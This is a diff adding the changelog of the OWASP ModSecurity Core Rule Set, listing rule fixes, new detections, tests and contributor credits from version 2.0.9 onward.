+ * Fix Docker image SSL support (Franziska Bühler)
+ * Fix duplicate .env (jschleus, Chaim Sanders)
+ * Fix executing paranoia level counters (Christian Folini)
+ * Fix indentation and python version in crs2-renumbering script (Chaim Sanders)
+ * Fix input / headers misordering (Christian Folini)
+ * Fix path traversal attack pattern at id:930110 (Ervin Hegedus)
+ * Fix regexp in Docker image (Franziska Bühler)
+ * Fix regexp with incorrect dot '.' escape in rule 943120 (XeroChen)
+ * Fix request header Sec-Fetch-User false positive (na1ex)
+ * Fix runaway regexp in 942260. Add variant regexp assemble script to handle possessive qualifiers. Use possessive qualifiers to tight this up and solve ReDoS problem. (Federico G. Schwindt)
+ * Fix small typo in variable (Felipe Zipitria)
+ * Fix spelling error in variable name (supplient)
+ * Fix transform name pointed out by secrules_parsing (Federico G. Schwindt)
+ * Fix Travis Merge not being able to find HEAD (Chaim Sanders)
+ * Fix vulnerable regexp in rule 942490 (CVE-2019-11387) (Christoph Hansen)
+ * Fix wrong regex, assembly result, in 942370 (Franziska Bühler)
+ * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop)
+ * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan)
+ * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen)
+ * Mark patterns not supported by re2 (Federico G. 
Schwindt)
+ * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt)
+ * Move PROXYLOCATION var (Franziska Bühler)
+ * PHP: move get_defined_functions() and friends into PL1 (Walter Hop)
+ * Pin the ftw version to 1.1.7 for now (Federico G. Schwindt)
+ * Prevent bypass 933180 PHP Variable Function (Andrea Menin)
+ * Reduce comments, introduction of triggered exploits (Franziska Bühler)
+ * Remove all trailing spaces from ftw yaml test files (Ervin Hegedus)
+ * Remove auditlog No other rules specify it. Add missing quotes and drop rev (Federico G. Schwindt)
+ * Remove capture, remove tx.0, add transformation functions, fix regex, add presentation link (Andrea Menin)
+ * Remove old and unwanted setvar constructs (Federico G. Schwindt)
+ * Remove superfluous comments (Walter Hop)
+ * Remove superfluous pmf (Federico G. Schwindt)
+ * Remove t:lowercase from 920490 (Christian Folini)
+ * Remove WARNING from php-errors.data (Andrea Menin)
+ * Reorder actions (Federico G. Schwindt)
+ * Replacing all @pmf with @pmFromFile (Christian Treutler)
+ * Restricted-files.data: add AWS config (Walter Hop)
+ * SQLI: removed unnecessary + (Christoph Hansen)
+ * Switch Docker image to owasp/modsecurity:2.9-apache-ubuntu (Federico G. Schwindt)
+ * unix-shell.data: fix typo in 'more' (Walter Hop)
+ * Update .travis.yml Update to support v3.1 (Chaim Sanders)
+ * Update dockerfile to always use 3.2/dev (Federico G. 
Schwindt)
+ * Update OWASP CRS Docker image to support the new upstream and 2.9.3 (Peter Bittner, Chaim Sanders)
+ * Update RESPONSE-950-DATA-LEAKAGES.conf (Christoph Hansen)
+ * Update RESPONSE-959-BLOCKING-EVALUATION.conf (Christoph Hansen)
+ * Wordpress: add support for Gutenberg editor (siric_, Walter Hop)
+ * Wordpress: allow searching for any term in admin posts/pages overview (Walter Hop)
+ * WordPress: exclude Gutenberg via rest_route (Walter Hop)
+ * WordPress: exclude some more profile.php fields from RFI rule (Walter Hop)
+ * WordPress: exclude SQL comment rule from _wp_http_referer (Walter Hop)
+ * XML Soap Encoding fix 920240 (Christoph Hansen)
+
+Unit tests:
+ * 932140: add regression tests (Walter Hop)
+ * 933180: fix tests which were doing nothing (Walter Hop)
+ * 941370: add some more tests, fix whitespace (Walter Hop)
+ * Add more tests for 941130 (Christian Folini)
+ * Add regression test for 941101 (Avery Wong)
+ * Add regression tests for 942150, 942100, 942260 (Christian Folini)
+ * Add regression tests to 941160 (Franziska Bühler)
+ * Add some regression tests (Ervin Hegedus)
+ * Add testing support for libmodsecurity running on Apache and Nginx (Chaim Sanders)
+ * Add tests for 941360 that fights JSFuck and Hieroglyphy (Christian Folini)
+ * Add tests for rule 921110 (Yu Yagihashi)
+ * Added regression tests for rules 942320, 942360, 942361, 942210, 942380, 942410, 942470, 942120, 942240, 942160, 942190, 942140, 942490, 942120 (Christoph Hansen)
+ * Drop tests for removed rules (Federico G. Schwindt)
+ * Fix failing regression tests (Ervin Hegedus)
+ * Fix failing tests (Manuel Spartan, Chaim Sanders)
+ * Fix readme typos in example rule (Walter Hop)
+ * Fix test 941110-2 (Federico G. Schwindt)
+ * Fix YAML 1.2 compliance with "true" (Federico G. Schwindt)
+ * RCE: Add tests for the for command (Federico G. 
Schwindt)
+ * Update regression tests for rules 931110, 931120, 931130 (Simon Studer)
+
+Documentation:
+ * Add details to README for Dockerhub (Franziska Bühler)
+ * Add intro/comment to CVE comments (Franziska Bühler)
+ * CONTRIBUTING: add note about separate PRs (Walter Hop)
+ * Erased gitter chat. Added CII badge (Felipe Zipitria)
+ * Replaced descriptions (Christian Folini)
+ * Summarized authors on single line in tests for 941160 (Christian Folini)
+ * Update broken link in regexp-assemble blog URLs (Walter Hop)
+ * Update CONTRIBUTING.md To base changes on v3.2/dev. (Felipe Zipitría)
+ * Update CONTRIBUTORS order (Andrea Menin)
+ * Update README.md (Rufus125)
+ * Updating crs site location (Chaim Sanders)
+
+## Version 3.1.1 - 2019-06-26
+
+ * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt)
+ * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt)
+ * Allow % encoding in 920240 (Christoph Hansen)
+ * Fix bug in 920440 (Andrea Menin)
+ * Fix bug in 920470 (Walter Hop)
+ * Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt)
+ * Fix bug in 943120 (XeroChen)
+
+## Version 3.1.0 - 2018-08-07
+
+ * Add Detectify scanner (Andrea Menin)
+ * Renaming matched_var/s (Victor Hora)
+ * Remove lines with bare '#' comment char (Walter Hop)
+ * Drop the XML variable from rule 932190 (Federico G. Schwindt)
+ * Update outdated URLs (Walter Hop)
+ * remove unused rule 901180 (Walter Hop)
+ * Drop exit from unix and windows RCE (Federico G. Schwindt)
+ * Fix anomaly_score counters (Federico G. 
Schwindt)
+ * Remove mostly redundant 944220 in favor of 944240 (Christian Folini)
+ * Add self[ and document[ to rule 941180 (Andrea Menin)
+ * Provide proxy support within CRS docker image (Scott O'Neil)
+ * Prevent bypass in rule 930120 PL3 (Andrea Menin)
+ * Fix small typo in variable (Felipe Zipitría)
+ * Fix bug #1166 in Docker image (Franziska Bühler)
+ * Remove revision status from rules (Federico G. Schwindt)
+ * Add template for issues (Federico G. Schwindt)
+ * Correct failing travis tests in merge situations (Federico G. Schwindt)
+ * Remove unused global variable in IIS rules (Chaim Sanders)
+ * Refactor to use phase number instead of name (Federico G. Schwindt)
+ * Add uploaded file name check; refresh LFI / filename checks (Walter Hop)
+ * Introduce critical sibling of 920340 in PL2 (Walter Hop)
+ * Fix bypass caused by multiple spaces in RCE rules (Walter Hop)
+ * Remove unneeded regex capture groups (Federico G. Schwindt)
+ * Add built-in exceptions for CPanel (Christoph Hansen)
+ * Add additional file restrictios for ws_ftp, DS_Store... 
(Jose Nazario)
+ * Fix missing strings in 942410 (Franziska Bühler)
+ * Add 2 missing PDO errors (Christoph Hansen)
+ * Fix issues with FPs in regression tests (Chaim Sanders)
+ * Add Nextcloud client exclusion support (Christoph Hansen)
+ * Fix spelling mistakes in REQUEST-942- (Padraig Doran, Chaim Sanders)
+ * Explicitly ignore the user defined rules (Aaron Haaf, Chaim Sanders)
+ * Add regression tests for 942490 (Christoph Hansen, Chaim Sanders)
+ * Add Owncloud client exclusion support (Christoph Hansen, Christian Folini)
+ * Adding 'F-Secure Radar' vulnerability scanner UA (Christian Folini, Chaim Sanders)
+ * Update DockerFile to use Ubuntu as base (Chaim Sanders)
+ * False positives 942360: move alter and union (Franziska Bühler, Chaim Sanders)
+ * Add support for Java style attacks (Manuel Spartan, Walter Hop)
+ * Fix various regression tests issues caused by webserver handling (azhao155, Chaim Sanders)
+ * Update TravisCI to build on a per PR basis (Chaim Sanders)
+ * Optimized rule 921160 and regex (Allan Boll, Chaim Sanders)
+ * Update the consistency across various files (Federico G. Schwindt)
+ * Add missing transform, 944120 sibling 944240 (Manuel Spartan)
+ * Fix false positive for 'like' in 942120 (Walter Hop)
+ * Add regression tests for Java Rules (Manuel Spartan)
+ * Fixup and small reorg of dokuwiki rule exclusion package (Christian Folini)
+ * Make TravisCI tests fail if Apache can't load rules (Felipe Zipitría)
+ * Add exclusion rules for Dokuwiki (Matt Bagley, Christian Folini)
+ * Initial exclusions for NextCloud installs (Matt Bagley, Christian Folini)
+ * Added struts-pwn UA to list (Manuel Spartan)
+ * Uses MULTIPART_MISSING_SEMICOLON instead of MULTIPART_SEMICOLON_MISSING (Felipe Zimmerle)
+ * Add file upload checks (Manuel Spartan)
+ * Check if Transfer-Encoding is missing (Federico G. Schwindt, Christian Folini)
+ * Remove duplicated variables (Federico G. 
Schwindt)
+ * Reduce FP by splitting classic SQL injection rule 942370 (Christoph Hansen)
+ * Fix typo in REQUEST-920-PROTOCOL-ENFORCEMENT (ihacku, Franziska Bühler)
+ * Add configurable timestamp format to FTW integration (Christian Folini)
+ * Add badges to README (Felipe Zipitría)
+ * Add clarifying comments to 910110 (Christian Folini)
+ * Making rule 933131 case-insensitive (Manuel Spartan)
+ * Merge and reorder rules as part of cleanup (Federico G. Schwindt)
+ * Update copyright date and syntax (Jose Nazario, Felipe Zipitría)
+ * Updated SecMarker and SkipAfter names to use meet guidelines (Felipe Zipitría)
+ * Tidy up single quotes and other guidelines updates (Felipe Zipitría)
+ * Syntax fix for setvar crs_exclusions_wordpress (Manuel Spartan)
+ * Updated various contributors to developers (Christian Folini)
+ * Revise SQL rules by disassembling them into their core protections (Franziska Bühler)
+ * Add an example payload to 920220 (coolt)
+ * Add a missing regex to rule 942310 (Franziska Bühler)
+ * Detect GET or HEAD with Transfer-Encoding header (Federico G. Schwindt)
+ * Fix broken links in references (Pásztor Gábor)
+ * Add contributing guidelines (Felipe Zipitría)
+ * Fix processing bypasses in rule 931130 (Felipe Zipitría, Christian Folini)
+ * Correct small omissions in unix-shell.data (Walter Hop)
+ * Add IIS specific detection to LFI-os-files.data (Manuel Spartan)
+ * Update examples to match the current cleanup (Federico G. Schwindt)
+ * Corrected the ordering of actions to meet guidelines (Felipe Zipitría)
+ * Remove unused capture groups (Federico G. Schwindt)
+ * Use explicit rx operator (Federico G. Schwindt)
+ * Update the RCE regular expressions(Walter Hop, Federico G. 
Schwindt)
+ * Removing maturity & accuracy from rules (Felipe Zipitría)
+ * Increasing range header (Christoph Hansen)
+ * Fixed upgrade.py script argument options (Glyn Mooney)
+ * Updating to reflect OWASP flagship status (Chaim Sanders)
+ * Adding Docker support for CRS (Chaim Sanders)
+ * Initial Travis deployment (Zack Allen, Walter Hop)
+ * Initial commit of regression tests (Chaim Sanders, Walter Hop)
+ * Remove test for 921170 because it won't ever fire (Chaim Sanders, Walter Hop)
+ * Update minor incorrectness in asp.net regex (Chaim Sanders, Walter Hop)
+ * Add notification for builds against #modsecurity on freenode (Zack Allen, Walter Hop)
+ * Add all past code contributors and convert to markdown (Walter Hop)
+ * Block uploads of files with .phps extension (Walter Hop)
+ * Improve message for script upload with superfluous extension (Walter Hop)
+ * Remove trailing whitespace in various regexs (Walter Hop)
+ * Add command popd to direct unix rce list in rule 932150 (Franziska Bühler)
+ * Remove unnecessary END_XSS_CHECKS marker (Christian Folini)
+ * Ignore Whitespaces in Rule 942110 (Christoph Hansen)
+ * Update missing RCE Commands (Umar Farook)
+ * Update lfi-os-files.data (Umar Farook)
+ * Removed deprecated t:removeComments from 942100 (Christian Folini)
+ * Add word boundary to rule 942410 (Franziska Bühler)
+
+## Version 3.0.2 - 2017-05-12
+
+ * Remove debug rule that popped up in 3.0.1 (Christian Folini)
+
+
+## Version 3.0.1 - 2017-05-09
+
+ * SECURITY: Removed insecure handling of X-Forwarded-For header;
+ reported by Christoph Hansen (Walter Hop)
+ * Fixed documentation errors in RESPONSE-999-... 
(Chaim Sanders)
+ * Reduced FPs on 942190 by adding a word boundary to regex (Franziska Bühler)
+ * Reduced FPs on 932150 by removing keyword reset (Franziska Bühler)
+ * Tidied exceptions in 930100 (Roberto Paprocki)
+ * Reduced FPs for 920120 by splitting into stricter sibling (Franziska Bühler)
+ * Simplified some Drupal rule exclusions (Damien McKenna, Christian Folini)
+ * Extended KNOWN_BUGS with remarks on JSON support on Debian (Franziska Bühler)
+ * Updated README to add gitter support (Chaim Sanders)
+ * Clarified DoS documentation for static extensions (Roberto Paprocki)
+ * Added application/octet-stream to allowed content types (Christian Folini)
+ * Typo in 942220 alert message (Chaim Sanders, @bossloper)
+ * Moved referrer check of 941100 into new PL2 rule (Franziska Bühler)
+ * Closed multiple @pmf evasions via lowercase transformation (Roberto Paprocki)
+ * Clarified libinjection bundling in INSTALL file (@cjdp)
+ * Reduced FPs via Wordpress Rule Exclusions (Walter Hop)
+ * Support for RFC 3902 (Content Type application/soap+xml; Christoph Hansen)
+ Make sure you update ModSecurity recommended rule 200000 as well. 
+ * Bugfix in 942410 regex (Christian Folini)
+ * Reduced FPs for 942360 (Walter Hop)
+ * Reduced FPs for 941120 by restricting event handler names (Franziska Bühler)
+ * Extended 931000 with scheme "file" to fix false negative (Federico Schwindt)
+ * Extended 905100 and 905110 for HTTP/2.0 (includes bugfix, Christoph Hansen)
+ * Moved 941150 from PL1 to PL2; includes Bugfix for rule (Christian Folini)
+ * Updated documentation for 920260 (Chaim Sanders)
+ * Bugfix in upgrade.py (Victor Hora)
+ * Fixed FP in RCE rule 932140 (Walter Hop)
+ * Fixed comment for arg limit check rule 920370 (Christian Folini)
+ * Created CONTRIBUTORS file
+ * Added Christoph Hansen (emphazer) to CONTRIBUTORS file
+ * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file
+ * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini)
+
+
+## Version 3.0.0 - 2016-11-10
+
+Huge changeset running in separate branch from September 2013 to September 2016.
+This is a cursory summary of the most important changes:
+
+ * Huge reduction of false positives (Ryan Barnett, Felipe Zimmerle, Chaim
+ Sanders, Walter Hop, Christian Folini)
+ * Anomaly scoring is the new default, renamed thresholds from
+ tx.(in|out)bound_anomaly_score_level to
+ tx.(in|out)bound_anomaly_score_threshold
+ * Introduction of libinjection for SQLi detection
+ * Introduction of libinjection for XSS detection
+ * Big improvement on detection of Remote Command Execution (Walter Hop)
+ * Big improvement on PHP function name detection (Walter Hop)
+ * Paranoia Mode (Christian Folini, Noël Zindel, Franziska Bühler,
+ Manuel Leos, Walter Hop)
+ * Shifted dozens of rules into higher paranoia levels
+ * Introduced a lot of stricter sibling rules in higher levels
+ * Generic mechanism to support application specific rule exclusions
+ (Chaim Sanders)
+ * Initial Wordpress rule exclusions (Walter Hop)
+ * Initial Drupal rule exclusions (Christian Folini, @emphazer)
+ * Renumbering of rules. 
See folder id_renumbering for a
+ csv map (Chaim Sanders)
+ * Consolidation of rules, namely XSS and SQLi (Spider Labs/Trustwave team)
+ * Sampling mode / Easing in (Christian Folini)
+ * Cleanup of reputation checks / persistent blocking
+ (Christian Folini / Walter Hop)
+ * Tags much more systematic (Walter Hop)
+ * IP reputation checks / persistent blocking of certain clients
+ (Spider Labs/Trustwave team)
+ * Phase actions use request/response/logging now instead of
+ numerical phases (Spider Labs/Trustwave team)
+ * Added NoScript XSS Filters (Spider Labs/Trustwave team)
+ * Updated "severity" action to use words (CRITICAL, WARNING, etc...)
+ vs. numbers (5, 4, etc..)
+ * Various regex fixes after research by Vladimir Ivanov (Chaim Sanders)
+ * Overhaul of the regression mode into debug mode (Walter Hop, Ryan Barnett)
+ * Introduction of util/upgrade.py (Walter Hop)
+ * Removal of GeoIP database. Download via util/upgrade.py now.
+ * Introduction of Initialization rules with
+ default values (Walter Hop, Christian Folini)
+ * Sorting out terminology with
+ whitelisting and rule exclusions (Christian Folini)
+ * Overhaul of testing (Chaim Sanders)
+ * Protection from HTTP Parameter Pollution (Franziska Bühler)
+ * Simplification of setup config file, renamed file to crs-setup.conf.example
+ * Improved session fixation detection logic (Christian Peron, credits to
+ Eric Hodel for the discovery)
+ * Updated list of malicious webscanners
+ * Splitting scanner user agents data files (github user @ygrek)
+ * Countless bugfixes in severities, anomaly scores, tags, etc. 
+ across the board
+ * Cleanup of formerly experimental DDoS rules,
+ fix documentation (Ryan Barnett, Christian Folini)
+ * Improves http blacklist checks (Walter Hop)
+ * Extended XSS detection (as suggested by Mazin Ahmed)
+ * Added support for Travis CI
+ * Added support for HTTP/2 in recent Apache 2.4 (Walter Hop)
+ * Added many, many bots and scanners (among others suggested by
+ github user @toby78, @jamuse, Matt Koch)
+ * Fixed mime types suitable for XML processor (Chaim Sanders)
+ * Include script in util/join-multiline-rules to work around
+ Apache 2.4 < 2.4.11 bug with long lines (Walter Hop)
+ * New detection for request smuggling attacks (Achim Hofmann,
+ Christian Folini)
+ * Fixes with project honeypot setup (Ryan Barnett)
+ * Separated DB / SQL messages by DB software (Ryan Barnett)
+ * CPanel integration (Chaim Sanders)
+ * Introduction of var for static resources (Chaim Sanders)
+ * Many improvements to rules in 2014/5 (Ryan Barnett)
+
+
+## Version 2.2.9 - 2013-09-30
+
+Improvements:
+* Updated the /util directory structure
+
+
+Bug Fixes:
+* fix 950901 - word boundary added
+* modsecurity_35_bad_robots.data - gecko/25 blocks Firefox Android
+ https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/157
+
+
+## Version 2.2.8 - 2013-06-30
+
+Improvements:
+* Updatd the /util directory structure
+* Added scripts to check Rule ID duplicates
+* Added script to remove v2.7 actions so older ModSecurity rules will work
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43
+* Added new PHP rule (958977) to detect PHP exploits (Plesk 0-day from king cope)
+ - http://seclists.org/fulldisclosure/2013/Jun/21
+ - http://blog.spiderlabs.com/2013/06/honeypot-alert-active-exploits-attempts-for-plesk-vulnerability-.html
+
+
+Bug Fixes:
+* fix 950901 - word boundary added
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/48
+* fix regex error
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/44
+* Updated the Regex in 981244 to 
include word boundaries
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/36
+* Problem with Regression Test (Invalid use of backslash) - Rule 960911 - Test2
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/34
+* ModSecurity: No action id present within the rule - ignore_static.conf
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/17
+* "Bad robots" rule blocks all Java applets on Windows XP machines
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/16
+* duplicated rules id 981173
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18
+
+
+## Version 2.2.7 - 2012-12-19
+
+Improvements:
+* Added JS Overrides file to identify successful XSS probes
+* Added new XSS Detection Rules from Ashar Javed (http://twitter.com/soaj1664ashar)
+ - http://jsfiddle.net/U9RmU/4/
+* Updated the SQLi Filters to add in Oracle specific functions
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/7
+
+Bug Fixes:
+* Fixed Session Hijacking rules
+ - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/8
+* Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable
+
+
+## Version 2.2.6 - 2012-09-14
+
+Improvements:
+* Started rule formatting update for better readability
+* Added maturity and accuracy action data to each rule
+* Updated rule revision (rev) action
+* Added rule version (ver) action
+* Added more regression tests (util/regression_tests/)
+* Modified Rule ID 960342 to block large file attachments in phase:1
+* Removed all PARANOID rule checks
+* Added new Session Fixation rules
+
+Bug Fixes:
+* Fixed missing ending double-quotes in XSS rules file
+* Moved SecDefaultAction setting from phase:2 to phase:1
+* Fixed Session Hijacking SessionID Regex
+ https://www.modsecurity.org/tracker/browse/CORERULES-79
+* Changed the variable listing for many generic attack rules to exclude REQUEST_FILENAME
+ https://www.modsecurity.org/tracker/browse/CORERULES-78
+
+
+## Version 2.2.5 - 2012-06-14
+
+Security 
Fixes:
+* Updated the anomaly scoring value for rule ID 960000 to critical
+ (Identified by Qualys Vulnerability & Malware Research Labs (VMRL))
+ (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses)
+* Updated Content-Type check to fix possible evasion with @within
+ (Identified by Qualys Vulnerability & Malware Research Labs (VMRL))
+ (https://community.qualys.com/blogs/securitylabs/2012/06/15/modsecurity-and-modsecurity-core-rule-set-multipart-bypasses)
+
+Improvements:
+* Renamed main config file to modsecurity_crs_10_setup.conf
+* Updated the rule IDs to start from CRS reserved range: 900000
+* Updated rule formatting for readability
+* Updated the CSRF rules to use UNIQUE_ID as the token source
+* Added the zap2modsec.pl script to the /util directory which converts
+ OWASP ZAP Scanner XML data into ModSecurity Virtual Patches
+* Updated the Directory Traversal Signatures to include more obfuscated data
+* Added Arachni Scanner Integration Lua script/rules files
+
+Bug Fixes:
+* Added forceRequestBodyVariable action to rule ID 960904
+
+
+## Version 2.2.4 - 2012-03-14
+
+Improvements:
+* Added Location and Set-Cookie checks to Response Splitting rule ID 950910
+* Added a README file to the activated_rules directory
+* Consolidate a number of SQL Injection rules into optimized regexs
+* Removed multiMatch and replaceComments from SQL Injection rules
+* Updated the SQLi regexs for greediness
+* Updated the SQLi setvar anomaly score values to use macro expansion
+* Removed PARANOID mode rules
+
+Bug Fixes:
+* Fixed missing comma before severity action in rules 958291, 958230 and 958231
+* Fixed duplidate rule IDs
+
+
+## Version 2.2.3 - 2011-12-19
+
+Improvements:
+* Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file
+ http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies
+* Added Watcher Charset Checks to 
optional_rules/modsecurity_crs_55_application_defects.conf file
+ http://websecuritytool.codeplex.com/wikipage?title=Checks#charset
+* Added Watcher Header Checks to optional_rules/modsecurity_crs_55_application_defects.conf file
+ http://websecuritytool.codeplex.com/wikipage?title=Checks#header
+
+Bug Fixes:
+* Fixed Content-Type evasion issue by adding ctl:forceRequestBodyVariable action to
+ rule ID 960010. (Identified by Andrew Wilson of Trustwave SpiderLabs).
+* Updated the regex and added tags for RFI rules.
+
+
+## Version 2.2.2 - 2011-09-28
+
+
+Improvements:
+* Updated the AppSensor Profiling (to use Lua scripts) for Request Exceptions Detection Points
+* Added new Range header detection checks to prevent Apache DoS
+* Added new Security Scanner User-Agent strings
+* Added example script to the /util directory to convert Arachni DAST scanner
+ XML data into ModSecurity virtual patching rules.
+* Updated the SQLi Character Anomaly Detection Rules
+* Added Host header info to the RESOURCE collection key for AppSensor profiling rules
+
+Bug Fixes:
+* Fixed action list for XSS rules (replaced pass,nolog,auditlog with block)
+* Fixed Request Limit rules by removing & from variables
+* Fixed Session Hijacking IP/UA hash captures
+* Updated the SQLi regex for rule ID 981242
+
+
+## Version 2.2.1 - 2011-07-20
+
+
+Improvements:
+* Extensive SQL Injection signature updates as a result of the SQLi Challenge
+ http://www.modsecurity.org/demo/challenge.html
+* Updated the SQL Error message detection in response bodies
+* Updated SQL Injection signatures to include more DB functions
+* Updated the WEAK SQL Injection signatures
+* Added tag AppSensor/RE8 to rule ID 960018
+
+Bug Fixes:
+* Fixed Bad Robot logic for rule ID 990012 to further qualify User-Agent matches
+ https://www.modsecurity.org/tracker/browse/CORERULES-70
+* Fixed Session Hijacking rules to properly capture IP address network hashes. 
+* Added the multiMatch action to the SQLi rules
+* Fixed a false negative logic flaw within the advanced_filter_converter.lua script
+* Fixed missing : in id action in DoS ruleset.
+* Updated rule ID 971150 signature to remove ;
+
+
+## Version 2.2.0 - 2011-05-26
+
+
+Improvements:
+* Changed Licensing from GPLv2 to Apache Software License v2 (ASLv2)
+ http://www.apache.org/licenses/LICENSE-2.0.txt
+* Created new INSTALL file outlining quick config setup
+* Added a new rule regression testing framework to the /util directory
+* Added new activated_rules directory which will allow users to place symlinks pointing
+ to files they want to run. This allows for easier Apache Include wild-carding
+* Adding in new RULE_MATURITY and RULE_ACCURACY tags
+* Adding in a check for X-Forwarded-For source IP when creating IP collection
+* Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset)
+ http://websecuritytool.codeplex.com/wikipage?title=Checks#charset
+* Added new AppSensor rules to experimental_dir
+ https://owasp.org/www-project-appsensor/
+* Added new Generic Malicious JS checks in outbound content
+* Added experimental IP Forensic rules to gather Client hostname/whois info
+ http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html
+* Added support for Mozilla's Content Security Policy (CSP) to the experimental_rules
+ http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html
+* Global collection in the 10 file now uses the Host Request Header as the collection key.
+ This allows for per-site global collections.
+* Added new SpiderLabs Research (SLR) rules directory (slr_rules) for known vulnerabilities.
+ This includes both converted web rules from Emerging Threats (ET) and from SLR Team. 
+* Added new SLR rule packs for known application vulns for WordPress, Joomla and phpBB
+* Added experimental rules for detecting Open Proxy Abuse
+ http://blog.spiderlabs.com/2011/03/detecting-malice-with-modsecurity-open-proxy-abuse.html
+* Added experimental Passive Vulnerability Scanning ruleset using OSVDB and Lua API
+ http://blog.spiderlabs.com/2011/02/modsecurity-advanced-topic-of-the-week-passive-vulnerability-scanning-part-1-osvdb-checks.html
+* Added additional URI Request Validation rule to the 20 protocol violations file (Rule ID - 981227)
+* Added new SQLi detection rules (959070, 959071 and 959072)
+* Added "Toata dragostea mea pentru diavola" to the malicious User-Agent data
+ https://www.modsecurity.org/tracker/browse/CORERULES-64
+
+Bug Fixes:
+* Assigned IDs to all active SecRules/SecActions
+* Removed rule inversion (!) from rule ID 960902
+* Fixed false negative issue in Response Splitting Rule
+* Fixed false negative issue with @validateByteRange check
+* Updated the TARGETS listing for rule ID 950908
+* Updated TX data for REQBODY processing
+* Changed the pass action to block in the RFI rules in the 40 generic file
+* Updated RFI regex to catch IP address usage in hostname
+ https://www.modsecurity.org/tracker/browse/CORERULES-68
+* Changed REQUEST_URI_RAW variable to REQUEST_LINE in SLR rules to allow matches on request methods.
+* Updated the RFI rules in the 40 generic attacks conf file to remove explicit logging actions.
+ They will now inherit the settings from the SecDefaultAction
+
+
+## Version 2.1.2 - 2011-02-17
+
+
+Improvements:
+* Added experimental real-time application profiling ruleset.
+* Added experimental Lua script for profiling the # of page scripts, iframes, etc..
+ which will help to identify successful XSS attacks and planting of malware links.
+* Added new CSRF detection rule which will trigger if a subsequent request comes too
+ quickly (need to use the Ignore Static Content rules). 
+
+Bug Fixes:
+* Added missing " in the skipAfter SecAction in the CC Detection rule set
+
+
+## Version 2.1.1 - 2010-12-30
+
+
+Bug Fixes:
+* Updated the 10 config conf file to add in pass action to User-Agent rule
+* Updated the CSRF ruleset to conditionally do content injection - if the
+ csrf token was created by the session hijacking conf file
+* Updated the session hijacking conf file to only enforce rules if a SessionID
+ Cookie was submitted
+* Fixed macro expansion setvar bug in the restricted file extension rule
+* Moved the comment spam data file into the optional_rules directory
+
+
+## Version 2.1.0 - 2010-12-29
+
+
+Improvements:
+* Added Experimental Lua Converter script to normalize payloads. Based on
+ PHPIDS Converter code and it used with the advanced filters conf file.
+* Changed the name of PHPIDS converted rules to Advanced Filters
+* Added Ignore Static Content (Performance enhancement) rule set
+* Added XML Enabler (Web Services) rule set which will parse XML data
+* Added Authorized Vulnerability Scanning (AVS) Whitelist rule set
+* Added Denial of Service (DoS) Protection rule set
+* Added Slow HTTP DoS (Connection Consumption) Protection rule set
+* Added Brute Force Attack Protection rule set
+* Added Session Hijacking Detection rule set
+* Added Username Tracking rule set
+* Added Authentication Tracking rule set
+* Added Anti-Virus Scanning of File Attachments rule set
+* Added AV Scanning program to /util directory
+* Added Credit Card Usage Tracking/Leakage Prevention rule set
+* Added experimental CC Track/PAN Leakage Prevention rule set
+* Added an experimental_rules directory to hold new BETA rules
+* Moved the local exceptions conf file back into base_rules directory however
+ it has a ".example" extension to prevent overwriting customized versions
+ when upgrading
+* Separated out HTTP Parameter Pollution and Restricted Character Anomaly Detection rules to
+ the experimental_rules directory
+* Adding the 
REQUEST_HEADERS:User-Agent macro data to the initcol in 10 config file, which will
+ help to make collections a bit more unique
+
+
+
+## Version 2.0.10 - 2010-11-29
+
+
+Improvements:
+* Commented out the Anomaly Scoring Blocking Mode TX variable since, by default, the CRS
+ is running in traditional mode.
+
+Bug Fixes:
+* Moved all skipAfter actions in chained rules to chain starter SecRules
+ https://www.modsecurity.org/tracker/browse/MODSEC-159
+* Changed phases on several rules in the 20 protocol anomaly rules file to phase:1 to avoid FNs
+
+
+
+## Version 2.0.9 - 2010-11-17
+
+
+Improvements:
+* Changed the name of the main config file to modsecurity_crs_10_config.conf.example so that
+ it will not overwrite existing config settings. Users should rename this file to activate
+ it.
+* Traditional detection mode is now the current default
+* Users can now more easily toggle between traditional/standard mode vs. anomaly scoring mode
+ by editing the modsecurity_crs_10_config.conf file
+* Updated the disruptive actions in most rules to use "block" action instead of "pass". This
+ is to allow for the toggling between traditional vs. anomaly scoring modes.
+* Removed logging actions from most rules so that it can be controlled from the SecDefaultAction
+ setting in the modsecurity_crs_10_config.conf file
+* Updated the anomaly scores in the modsecurity_crs_10_config.conf file to more closely match
+ what is used in the PHPIDS rules. These still have the same factor of severity even though
+ the numbers themselves are smaller.
+* Updated the 49 and 59 blocking rules to include the matched logdata
+* Updated the TAG data to further classify attack/vuln categories. 
+* Updated the SQL Injection filters to detect more boolean logic attacks
+* Moved some files to optional_rules directory (phpids, Emerging Threats rules)
+
+Bug Fixes:
+* Fixed Rule ID 960023 in optional_rules/modsecurity_crs_40_experimental.conf is missing 1 single quote
